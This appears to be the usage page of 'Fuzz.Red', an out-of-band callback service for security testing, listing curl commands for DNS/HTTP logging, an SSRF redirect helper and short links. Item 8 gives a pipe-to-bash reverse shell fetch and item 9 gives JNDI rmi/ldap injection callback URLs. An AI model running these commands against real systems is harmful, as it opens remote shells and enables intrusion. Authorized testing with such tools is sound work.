$$$$$$\ $$\ $$\ $$\ $$ __$$\ $$ | $$ | $$ | $$ / $$ |$$ | $$$$$$\ $$$$$$$\ $$$$$$\ $$ | $$$$$$\ $$$$$$\ $$$$$$$$ |$$ |$$ __$$\ $$ __$$\ \____$$\ $$ | $$ __$$\ $$ __$$\ $$ __$$ |$$ |$$ / $$ |$$ | $$ | $$$$$$$ |$$ | $$ / $$ |$$ / $$ | $$ | $$ |$$ |$$ | $$ |$$ | $$ |$$ __$$ |$$ | $$ | $$ |$$ | $$ | $$ | $$ |$$ |$$$$$$$ |$$ | $$ |\$$$$$$$ |$$$$$$$$\\$$$$$$ |\$$$$$$$ | \__| \__|\__|$$ ____/ \__| \__| \_______|\________|\______/ \____$$ | $$ | $$\ $$ | $$ | By:Alphabug \$$$$$$ | \__| Version:1.0.0.Releases \______/ # Welcome to Fuzz.Red # Usage: 1) Get token and subdomain $ curl callback.red/get => {"key":"","subdomain":".callback.red","rmi":"rmi://jndi.callback.red:5//","ldap":"ldap://jndi.callback.red:5//","short_url":"http://callback.red/"} 2) Query logs by key $ curl callback.red -X POST -d "key=" => {"code":200,"data":[...]} 3) DNS log $ ping -c 1 .callback.red 4) HTTP log $ curl .callback.red -d "test" 5) SSRF redirect helper $ curl -L callback.red/ssrf/www.example.com/ 6) Short URL (requires key) $ curl callback.red -X POST -d "key=&url=http://www.example.com" => http://callback.red/ 7) Share (same TTL as subdomain; off until enabled). Web UI uses hash link /#/share/; GET /resolve_share?token= returns session JSON when enabled. $ curl callback.red -X POST -d "key=&share_enable=1" $ curl callback.red -X POST -d "key=&share_enable=0" 8) Reverse shell payload $ curl callback.red/sh4ll/1.2.3.4:1234 | bash 9) JNDI callback rmi://jndi.callback.red:5//test ldap://jndi.callback.red:5//test Notice: Authorized security testing only. Disclaimer: By using callback.red, you agree to the following terms: This project is for authorized security testing and research only. Any unauthorized use is the sole responsibility of the user. Users must comply with GPL-2.0 terms: http://www.gnu.org/licenses/gpl-2.0.html